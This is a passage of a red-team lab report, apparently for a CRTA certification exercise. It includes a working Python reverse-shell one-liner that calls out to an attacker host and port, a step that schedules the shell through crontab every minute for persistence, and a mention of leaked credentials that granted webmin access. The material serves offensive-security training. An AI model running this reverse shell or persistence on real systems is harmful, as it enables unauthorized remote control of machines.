GalileoQ/ObsidianGIT/CRTA/Red Team Report (CRTA).md

 After receiving a shell from the previously executed exploit, we upgraded to a bash shell

 First we are going to create a Crontab task that executes a reverse Shell every 1 minute

 ![[Pasted image 20250512163457.png]]

 We use this reverse Shell written in Python

 ```python
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.250.11",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
 ```

 And finally we will be listening to the port we have selected.
 In this case the port 9001.
 We can see that we belong to another network interface

 ![[Pasted image 20250512162449.png]]

 # Credential leak

-#Nota: Some of these credentials were tested in the webmin service in port 1000 and we got access

 ![[Pasted image 20250512164302.png]]